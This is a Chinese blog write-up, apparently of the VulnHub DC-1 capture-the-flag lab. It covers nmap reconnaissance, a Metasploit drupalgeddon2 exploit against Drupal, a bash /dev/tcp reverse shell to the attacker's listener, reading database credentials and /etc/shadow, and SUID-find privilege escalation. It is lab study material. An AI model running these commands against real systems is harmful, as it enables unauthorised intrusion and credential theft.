首页 > 其他分享 >DC-1

DC-1

时间:2023-12-15 12:44:06浏览次数:23  
标签:nmap kali DC 192.168 43.215 cms find

vulnhub DC-1

tmux kali命令窗布局

tmux split-window——划分上下两个窗格

tmux split-window -h——划分左右两个窗格

先kali用nmap探测ip

kali的ip:192.168.43.149

由于靶机用虚拟机搭建,它和kali在同一网段

nmap扫描:

1.nmap -sP 192.168.43.0/24或者使用arp-scan -l

探测该网段下存活的主机

最终发现dc1的ip:192.168.43.215

2.nmap -T4 -A -v -Pn 192.168.43.215

-T4表示速度

-A强力扫描

-v显示进度

-Pn绕过ping进行扫描,也就是禁止ping时进行扫描

3.nmap -sT --min-rate 10000 -p- 192.168.43.215

通过2、3命令探测到靶机开放的端口:22、80、111、50335

然后就是访问80端口,发现cms——drupal

看到这个cms的登录框,首先想到搜一下它的弱口令以及爆破,无果

用msfconsole,找一下这个cms可以利用的漏洞

1.search drupal

image-20231215124044327

一个一个试,最终是:

2.use exploit/unix/webapp/drupal_drupalgeddon2

3.options

4.set LHOST 192.168.43.149

5.set RHOSTS 192.168.43.215

6.run

7.shell

算是进去了,可以执行一些命令

查看flag1.txt

这里明白了,以后要注意CMS的配置文件

cd sites/default

cat settings.php

配置文件里面有flag2

同时可以看到数据库的用户名和密码,根据flag2提示可以想到通过修改数据库,去修改CMS用户的密码从而登录

反弹个shell:

nc -lvp 5678

bash -i >/dev/tcp/192.168.43.149/5678 0>&1 2>&1

或者:

python -c 'import pty;pty.spawn("/bin/bash")'做个回显

账号:admin

密码:$S$DK8a6p.9BZ2hlNHj1itF5f1qJ1.BVXEHLaMY.ap1x0KM7l398CEt

find提权

which find

ls -l find的路径

如果有s则可以用find提权

find / -name test --exec "/bin/sh" ;

cat /etc/shadow

cd /root

标签:nmap,kali,DC,192.168,43.215,cms,find
From: https://www.cnblogs.com/q1stop/p/17903134.html

相关文章

  • DC电源模块:为您的电子设备提供稳定可靠的能量
    DC电源模块:为您的电子设备提供稳定可靠的能量BOSHIDADC电源模块是一种电子设备,用于为其他电子设备提供稳定可靠的直流电能。它通常由一个输入端,一个输出端和一些内部电路组成。输入端通常接收来自交流电源或其他电源的电能,经过内部电路的处理后,以所需的稳定电压输出到输出端,供其......
  • 高校刮起元宇宙风!3DCAT实时云渲染助力川轻化元校园建设
    元宇宙,是一个虚拟的网络世界,它与现实世界相互连接,为人们提供了一个身临其境的数字体验。元宇宙的概念并不新鲜,早在上个世纪就有科幻作家和电影导演对它进行了想象和创造。但是,随着科技的发展,特别是5G、AI、XR等前沿技术的突破,元宇宙的构建和发展已经成为可能,甚至成为了一种趋势。......
  • 让艺术触手可及!3DCAT实时云渲染赋能真浪数字艺术馆首展
    2023年5月18日,由真浪数字艺术和EZVR联合打造的真浪数字艺术馆首展–「破界·交织」让艺术更自由,正式与大家相见。此次展览分为五个主题展馆,汇聚了来自全球各领域的19位青年数字艺术家一同探讨虚实共生、人机共生和万物共生的艺术创作。真浪数字艺术馆由杭州虚拟人科技有限公司......
  • 事件相机PEK4I36HDCDMP 普诺飞思(Prophesee)EVK4 IMX636ES
    事件相机PEK4I36HDCDMP普诺飞思(Prophesee)EVK4IMX636ES探索基于事件的视觉,从PROPHESEEEVK4HD开始。这款超轻、紧凑的高清Metavision®评估套件,可承受现场测试条件。集成IMX636(高清),堆叠式事件视觉传感器由索尼半导体解决方案公司发布,由索尼和PROPHESEE合作实现。  ......
  • vulnhub DC-9靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口,发现只有80端口nmap-p-192.168.42.150扫描80开放的服务nmap-p80-A-V192.168.42.1502.漏洞发掘访问主页面发现有查找功能,猜测此处有sql注入漏洞测试sql注入漏洞‘or1=1#获取成功,存在注入漏洞,开始利用bp......
  • orchardcore 部署saas系统
    使用orchardcore搭建saas的webhost服务网络托管服务是一种互联网托管服务,允许个人和组织通过万维网访问他们的网站。我们将使用OrchardCoreCMS框架创建一个多租户、SaaS、Web托管服务。1启动VisualStudio,然后“创建新项目”。选择“ASP.NETCoreWebApplication”......
  • DC-8靶场
    准备:目标:获得root权限攻击虚拟机:kali  DC-8靶场:DC:8~VulnHub 虚拟机:IP地址 192.168.88.130 靶场IP地址:192.168.88.129 第一步:信息收集通过arp-scan-l查看本网段的虚拟机也可以通过nmap或者 netdiscover-r192.168.88.0/24netdiscover-r192.168.88......
  • vulnhub DC-5靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站,发现都是静态页面只有contact.php有上传窗口尝试上传,发现问题copyri......
  • 多种DC电源模块的比较和评价
    多种DC电源模块的比较和评价BOSHIDADC电源模块是一种重要的电子零件,可以将交流电转换为直流电,并为相应的电路提供所需的电能。随着技术的进步,市场上的DC电源模块种类越来越多,不同类型的DC电源模块有着不同的特点和优缺点。 1.线性稳压模块线性稳压模块是一种简单而实用的DC......
  • CH32V307 ADC与触摸按键的使用
    CH32V307的ADC模块具有两个独立的ADC单元,12位分辨率,支持16个外部通道和2个内部信号源采样。CH32V307的触摸检测单元,借助ADC模块的电压转换功能,通过将电容量转换为电压量进行采样,实现触摸按键检测功能。检测通道复用ADC的16个外部通道,通过ADC模块的单次转换模式实现触摸按键检测。......